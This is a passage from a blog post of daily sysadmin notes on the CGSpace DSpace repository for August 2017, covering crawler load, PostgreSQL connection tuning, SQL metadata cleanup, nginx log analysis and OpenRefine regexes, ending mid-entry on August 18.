+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-08/">August, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-08-01T11:51:52+03:00">Tue Aug 01, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-08-01">2017-08-01</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours</li>
+<li>I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)</li>
+<li>The good thing is that, according to <code>dspace.log.2017-08-01</code>, they are all using the same Tomcat session</li>
+<li>This means our Tomcat Crawler Session Valve is working</li>
+<li>But many of the bots are browsing dynamic URLs like:
+<ul>
+<li>/handle/10568/3353/discover</li>
+<li>/handle/10568/16510/browse</li>
+</ul>
+</li>
+<li>The <code>robots.txt</code> only blocks the top-level <code>/discover</code> and <code>/browse</code> URLs&hellip; we will need to find a way to forbid them from accessing these!</li>
+<li>Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li>
+<li>It turns out that we&rsquo;re already adding the <code>X-Robots-Tag &quot;none&quot;</code> HTTP header, but this only forbids the search engine from <em>indexing</em> the page, not crawling it!</li>
+<li>Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;</li>
+<li>We might actually have to <em>block</em> these requests with HTTP 403 depending on the user agent</li>
+<li>Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415</li>
+<li>This was due to newline characters in the <code>dc.description.abstract</code> column, which caused OpenRefine to choke when exporting the CSV</li>
+<li>I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using <code>g/^$/d</code></li>
+<li>Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet</li>
+</ul>
+<h2 id="2017-08-02">2017-08-02</h2>
+<ul>
+<li>Magdalena from CCAFS asked if there was a way to get the top ten items published in 2016 (note: not the top items in 2016!)</li>
+<li>I think Atmire&rsquo;s Content and Usage Analysis module should be able to do this but I will have to look at the configuration and maybe email Atmire if I can&rsquo;t figure it out</li>
+<li>I had a look at the moduel configuration and couldn&rsquo;t figure out a way to do this, so I <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-tickets">opened a ticket on the Atmire tracker</a></li>
+<li>Atmire responded about the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=500">missing workflow statistics issue</a> a few weeks ago but I didn&rsquo;t see it for some reason</li>
+<li>They said they added a publication and saw the workflow stat for the user, so I should try again and let them know</li>
+</ul>
+<h2 id="2017-08-05">2017-08-05</h2>
+<ul>
+<li>Usman from CIFOR emailed to ask about the status of our OAI tests for harvesting their DSpace repository</li>
+<li>I told him that the OAI appears to not be harvesting properly after the first sync, and that the control panel shows an &ldquo;Internal error&rdquo; for that collection:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/08/cifor-oai-harvesting.png" alt="CIFOR OAI harvesting"></p>
+<ul>
+<li>I don&rsquo;t see anything related in our logs, so I asked him to check for our server&rsquo;s IP in their logs</li>
+<li>Also, in the mean time I stopped the harvesting process, reset the status, and restarted the process via the Admin control panel (note: I didn&rsquo;t reset the collection, just the harvester status!)</li>
+</ul>
+<h2 id="2017-08-07">2017-08-07</h2>
+<ul>
+<li>Apply Abenet&rsquo;s corrections for the CGIAR Library&rsquo;s Consortium subcommunity (697 records)</li>
+<li>I had to fix a few small things, like moving the <code>dc.title</code> column away from the beginning of the row, delete blank spaces in the abstract in vim using <code>:g/^$/d</code>, add the <code>dc.subject[en_US]</code> column back, as she had deleted it and DSpace didn&rsquo;t detect the changes made there (we needed to blank the values instead)</li>
+</ul>
+<h2 id="2017-08-08">2017-08-08</h2>
+<ul>
+<li>Apply Abenet&rsquo;s corrections for the CGIAR Library&rsquo;s historic archive subcommunity (2415 records)</li>
+<li>I had to add the <code>dc.subject[en_US]</code> column back with blank values so that DSpace could detect the changes</li>
+<li>I applied the changes in 500 item batches</li>
+</ul>
+<h2 id="2017-08-09">2017-08-09</h2>
+<ul>
+<li>Run system updates on DSpace Test and reboot server</li>
+<li>Help ICARDA upgrade their MELSpace to DSpace 5.7 using the <a href="https://github.com/alanorth/docker-dspace">docker-dspace</a> container
+<ul>
+<li>We had to import the PostgreSQL dump to the PostgreSQL container using: <code>pg_restore -U postgres -d dspace blah.dump</code></li>
+<li>Otherwise, when using <code>-O</code> it messes up the permissions on the schema and DSpace can&rsquo;t read it</li>
+</ul>
+</li>
+</ul>
+<h2 id="2017-08-10">2017-08-10</h2>
+<ul>
+<li>Apply last updates to the CGIAR Library&rsquo;s Fund community (812 items)</li>
+<li>Had to do some quality checks and column renames before importing, as either Sisay or Abenet renamed a few columns and the metadata importer wanted to remove/add new metadata for title, abstract, etc.</li>
+<li>Also I applied the HTML entities unescape transform on the abstract column in Open Refine</li>
+<li>I need to get an author list from the database for only the CGIAR Library community to send to Peter</li>
+<li>It turns out that I had already used this SQL query in <a href="/cgspace-notes/2017-05">May, 2017</a> to get the authors from CGIAR Library:</li>
+</ul>
+<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
+</code></pre><ul>
+<li>Meeting with Peter and CGSpace team
+<ul>
+<li>Alan to follow up with ICARDA about depositing in CGSpace, we want ICARD and Drylands legacy content but not duplicates</li>
+<li>Alan to follow up on dc.rights, where are we?</li>
+<li>Alan to follow up with Atmire about a dedicated field for ORCIDs, based on the discussion in the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+June+2017">June, 2017 DCAT meeting</a></li>
+<li>Alan to ask about how to query external services like AGROVOC in the DSpace submission form</li>
+</ul>
+</li>
+<li>Follow up with Atmire on the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=510">ticket about ORCID metadata in DSpace</a></li>
+<li>Follow up with Lili and Andrea about the pending CCAFS metadata and flagship updates</li>
+</ul>
+<h2 id="2017-08-11">2017-08-11</h2>
+<ul>
+<li>CGSpace had load issues and was throwing errors related to PostgreSQL</li>
+<li>I told Tsega to reduce the max connections from 70 to 40 because actually each web application gets that limit and so for xmlui, oai, jspui, rest, etc it could be 70 x 4 = 280 connections depending on the load, and the PostgreSQL config itself is only 100!</li>
+<li>I learned this on a recent discussion on the DSpace wiki</li>
+<li>I need to either look into setting up a database pool through JNDI or increase the PostgreSQL max connections</li>
+<li>Also, I need to find out where the load is coming from (rest?) and possibly block bots from accessing dynamic pages like Browse and Discover instead of just sending an X-Robots-Tag HTTP header</li>
+<li>I noticed that Google has bitstreams from the <code>rest</code> interface in the search index. I need to ask on the dspace-tech mailing list to see what other people are doing about this, and maybe start issuing an <code>X-Robots-Tag: none</code> there!</li>
+</ul>
+<h2 id="2017-08-12">2017-08-12</h2>
+<ul>
+<li>I sent a message to the mailing list about the duplicate content issue with <code>/rest</code> and <code>/bitstream</code> URLs</li>
+<li>Looking at the logs for the REST API on <code>/rest</code>, it looks like there is someone hammering doing testing or something on it&hellip;</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
+    140 66.249.66.91
+    404 66.249.66.90
+   1479 50.116.102.77
+   9794 45.5.184.196
+  85736 70.32.83.92
+</code></pre><ul>
+<li>The top offender is 70.32.83.92 which is actually the same IP as ccafs.cgiar.org, so I will email the Macaroni Bros to see if they can test on DSpace Test instead</li>
+<li>I&rsquo;ve enabled logging of <code>/oai</code> requests on nginx as well so we can potentially determine bad actors here (also to see if anyone is actually using OAI!)</li>
+</ul>
+<pre tabindex="0"><code>    # log oai requests
+    location /oai {
+        access_log /var/log/nginx/oai.log;
+        proxy_pass http://tomcat_http;
+    }
+</code></pre><h2 id="2017-08-13">2017-08-13</h2>
+<ul>
+<li>Macaroni Bros say that CCAFS wants them to check once every hour for changes</li>
+<li>I told them to check every four or six hours</li>
+</ul>
+<h2 id="2017-08-14">2017-08-14</h2>
+<ul>
+<li>Run author corrections on CGIAR Library community from Peter</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-523.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p fuuuu
+</code></pre><ul>
+<li>There were only three deletions so I just did them manually:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;C&#39;;
+DELETE 1
+dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;WSSD&#39;;
+</code></pre><ul>
+<li>Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done</li>
+<li>Thinking about resource limits for PostgreSQL again after last week&rsquo;s CGSpace crash and related to a recently discussion I had in the comments of the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">April, 2017 DCAT meeting notes</a></li>
+<li>In that thread Chris Wilper suggests a new default of 35 max connections for <code>db.maxconnections</code> (from the current default of 30), knowing that <em>each DSpace web application</em> gets to use up to this many on its own</li>
+<li>It would be good to approximate what the theoretical maximum number of connections on a busy server would be, perhaps by looking to see which apps use SQL:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -rsI SQLException dspace-jspui | wc -l          
+473
+$ grep -rsI SQLException dspace-oai | wc -l  
+63
+$ grep -rsI SQLException dspace-rest | wc -l
+139
+$ grep -rsI SQLException dspace-solr | wc -l                                                                               
+0
+$ grep -rsI SQLException dspace-xmlui | wc -l
+866
+</code></pre><ul>
+<li>Of those five applications we&rsquo;re running, only <code>solr</code> appears not to use the database directly</li>
+<li>And JSPUI is only used internally (so it doesn&rsquo;t really count), leaving us with OAI, REST, and XMLUI</li>
+<li>Assuming each takes a theoretical maximum of 35 connections during a heavy load (35 * 3 = 105), that would put the connections well above PostgreSQL&rsquo;s default max of 100 connections (remember a handful of connections are reserved for the PostgreSQL super user, see <code>superuser_reserved_connections</code>)</li>
+<li>So we should adjust PostgreSQL&rsquo;s max connections to be DSpace&rsquo;s <code>db.maxconnections</code> * 3 + 3</li>
+<li>This would allow each application to use up to <code>db.maxconnections</code> and not to go over the system&rsquo;s PostgreSQL limit</li>
+<li>Perhaps since CGSpace is a busy site with lots of resources we could actually use something like 40 for <code>db.maxconnections</code></li>
+<li>Also worth looking into is to set up a database pool using JNDI, as apparently DSpace&rsquo;s <code>db.poolname</code> hasn&rsquo;t been used since around DSpace 1.7 (according to Chris Wilper&rsquo;s comments in the thread)</li>
+<li>Need to go check the PostgreSQL connection stats in Munin on CGSpace from the past week to get an idea if 40 is appropriate</li>
+<li>Looks like connections hover around 50:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/08/postgresql-connections-cgspace.png" alt="PostgreSQL connections 2017-08"></p>
+<ul>
+<li>Unfortunately I don&rsquo;t have the breakdown of which DSpace apps are making those connections (I&rsquo;ll assume XMLUI)</li>
+<li>So I guess a limit of 30 (DSpace default) is too low, but 70 causes problems when the load increases and the system&rsquo;s PostgreSQL <code>max_connections</code> is too low</li>
+<li>For now I think maybe setting DSpace&rsquo;s <code>db.maxconnections</code> to 40 and adjusting the system&rsquo;s <code>max_connections</code> might be a good starting point: 40 * 3 + 3 = 123</li>
+<li>Apply 223 more author corrections from Peter on CGIAR Library</li>
+<li>Help Magdalena from CCAFS with some CUA statistics questions</li>
+</ul>
+<h2 id="2017-08-15">2017-08-15</h2>
+<ul>
+<li>Increase the nginx upload limit on CGSpace (linode18) so Sisay can upload 23 CIAT reports</li>
+<li>Do some last minute cleanups and de-duplications of the CGIAR Library data, as I need to send it to Peter this week</li>
+<li>Metadata fields like <code>dc.contributor.author</code>, <code>dc.publisher</code>, <code>dc.type</code>, and a few others had somehow been duplicated along the line</li>
+<li>Also, a few dozen <code>dc.description.abstract</code> fields still had various HTML tags and entities in them</li>
+<li>Also, a bunch of <code>dc.subject</code> fields that were not AGROVOC had not been moved properly to <code>cg.system.subject</code></li>
+</ul>
+<h2 id="2017-08-16">2017-08-16</h2>
+<ul>
+<li>I wanted to merge the various field variations like <code>cg.subject.system</code> and <code>cg.subject.system[en_US]</code> in OpenRefine but I realized it would be easier in PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=254;
+</code></pre><ul>
+<li>And actually, we can do it for other generic fields for items in those collections, for example <code>dc.description.abstract</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;abstract&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)))
+</code></pre><ul>
+<li>And on others like <code>dc.language.iso</code>, <code>dc.relation.ispartofseries</code>, <code>dc.type</code>, <code>dc.title</code>, etc&hellip;</li>
+<li>Also, to move fields from <code>dc.identifier.url</code> to <code>cg.identifier.url[en_US]</code> (because we don&rsquo;t use the Dublin Core one for some reason):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set metadata_field_id = 219, text_lang = &#39;en_US&#39; where resource_type_id = 2 AND metadata_field_id = 237;
+UPDATE 15
+</code></pre><ul>
+<li>Set the text_lang of all <code>dc.identifier.uri</code> (Handle) fields to be NULL, just like default DSpace does:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like &#39;http://hdl.handle.net/10947/%&#39;;
+UPDATE 4248
+</code></pre><ul>
+<li>Also update the text_lang of <code>dc.contributor.author</code> fields for metadata in these collections:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;)));
+UPDATE 4899
+</code></pre><ul>
+<li>Wow, I just wrote this baller regex facet to find duplicate authors:</li>
+</ul>
+<pre tabindex="0"><code>isNotNull(value.match(/(CGIAR .+?)\|\|\1/))
+</code></pre><ul>
+<li>This would be true if the authors were like <code>CGIAR System Management Office||CGIAR System Management Office</code>, which some of the CGIAR Library&rsquo;s were</li>
+<li>Unfortunately when you fix these in OpenRefine and then submit the metadata to DSpace it doesn&rsquo;t detect any changes, so you have to edit them all manually via DSpace&rsquo;s &ldquo;Edit Item&rdquo;</li>
+<li>Ooh! And an even more interesting regex would match <em>any</em> duplicated author:</li>
+</ul>
+<pre tabindex="0"><code>isNotNull(value.match(/(.+?)\|\|\1/))
+</code></pre><ul>
+<li>Which means it can also be used to find items with duplicate <code>dc.subject</code> fields&hellip;</li>
+<li>Finally sent Peter the final dump of the CGIAR System Organization community so he can have a last look at it</li>
+<li>Post a message to the dspace-tech mailing list to ask about querying the AGROVOC API from the submission form</li>
+<li>Abenet was asking if there was some way to hide certain internal items from the &ldquo;ILRI Research Outputs&rdquo; RSS feed (which is the top-level ILRI community feed), because Shirley was complaining</li>
+<li>I think we could use <code>harvest.includerestricted.rss = false</code> but the items might need to be 100% restricted, not just the metadata</li>
+<li>Adjust Ansible postgres role to use <code>max_connections</code> from a template variable and deploy a new limit of 123 on CGSpace</li>
+</ul>
+<h2 id="2017-08-17">2017-08-17</h2>
+<ul>
+<li>Run Peter&rsquo;s edits to the CGIAR System Organization community on DSpace Test</li>
+<li>Uptime Robot said CGSpace went down for 1 minute, not sure why</li>
+<li>Looking in <code>dspace.log.2017-08-17</code> I see some weird errors that might be related?</li>
+</ul>
+<pre tabindex="0"><code>2017-08-17 07:55:31,396 ERROR net.sf.ehcache.store.DiskStore @ cocoon-ehcacheCache: Could not read disk store element for key PK_G-aspect-cocoon://DRI/12/handle/10568/65885?pipelinehash=823411183535858997_T-Navigation-3368194896954203241. Error was invalid stream header: 00000000
+java.io.StreamCorruptedException: invalid stream header: 00000000
+</code></pre><ul>
+<li>Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;ERROR net.sf.ehcache.store.DiskStore&#34; dspace.log.2017-08-*
+dspace.log.2017-08-01:0
+dspace.log.2017-08-02:0
+dspace.log.2017-08-03:0
+dspace.log.2017-08-04:0
+dspace.log.2017-08-05:0
+dspace.log.2017-08-06:0
+dspace.log.2017-08-07:0
+dspace.log.2017-08-08:0
+dspace.log.2017-08-09:0
+dspace.log.2017-08-10:0
+dspace.log.2017-08-11:8806
+dspace.log.2017-08-12:5496
+dspace.log.2017-08-13:2925
+dspace.log.2017-08-14:2135
+dspace.log.2017-08-15:1506
+dspace.log.2017-08-16:1935
+dspace.log.2017-08-17:584
+</code></pre><ul>
+<li>There are none in 2017-07 either&hellip;</li>
+<li>A few posts on the dspace-tech mailing list say this is related to the Cocoon cache somehow</li>
+<li>I will clear the XMLUI cache for now and see if the errors continue (though perpaps shutting down Tomcat and removing the cache is more effective somehow?)</li>
+<li>We tested the option for limiting restricted items from the RSS feeds on DSpace Test</li>
+<li>I created four items, and only the two with public metadata showed up in the community&rsquo;s RSS feed:
+<ul>
+<li>Public metadata, public bitstream ✓</li>
+<li>Public metadata, restricted bitstream ✓</li>
+<li>Restricted metadata, restricted bitstream ✗</li>
+<li>Private item ✗</li>
+</ul>
+</li>
+<li>Peter responded and said that he doesn&rsquo;t want to limit items to be restricted just so we can change the RSS feeds</li>
+</ul>
+<h2 id="2017-08-18">2017-08-18</h2>
+<ul>
+<li>Someone on the dspace-tech mailing list responded with some tips about using the authority framework to do external queries from the submission form</li>
+<li>He linked to some examples from DSpace-CRIS that use this functionality: <a href="https://github.com/4Science/DSpace/blob/dspace-5_x_x-cris/dspace-api/src/main/java/org/dspace/content/authority/VIAFAuthority.java">VIAFAuthority</a></li>
+<li>I wired it up to the <code>dc.subject</code> field of the submission interface using the &ldquo;lookup&rdquo; type and it works!</li>
+<li>I think we can use this example to get a working AGROVOC query</li>
+<li>More information about authority framework: <a href="https://wiki.lyrasis.org/display/DSPACE/Authority+Control+of+Metadata+Values">https://wiki.lyrasis.org/display/DSPACE/Authority+Control+of+Metadata+Values</a></li>
+<li>Wow, I&rsquo;m playing with the AGROVOC SPARQL endpoint using the <a href="https://github.com/tialaramex/sparql-query">sparql-query tool</a>:</li>
+</ul>
